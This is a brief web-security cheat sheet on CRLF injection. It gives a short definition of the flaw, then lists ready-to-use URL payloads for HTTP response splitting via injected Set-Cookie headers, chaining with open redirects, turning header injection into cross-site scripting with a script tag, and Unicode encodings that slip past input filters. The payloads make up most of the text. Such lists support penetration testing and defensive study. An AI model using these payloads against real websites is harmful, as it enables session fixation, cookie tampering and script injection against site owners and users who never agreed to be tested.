CRLF Injection¶
What is CRLF Injection?¶
CRLF injection vulnerability is a type of security flaw that occurs when an attacker can inject carriage return (CR) and line feed (LF) characters into an application's input. These characters are used to control the formatting of text in protocols like HTTP. Exploiting this vulnerability can allow attackers to manipulate the behavior of the application, such as inserting additional HTTP headers, modifying content, or performing other malicious actions. This can lead to various attacks, including HTTP response splitting, cross-site scripting (XSS), and session fixation.
Payloads¶
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue
2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test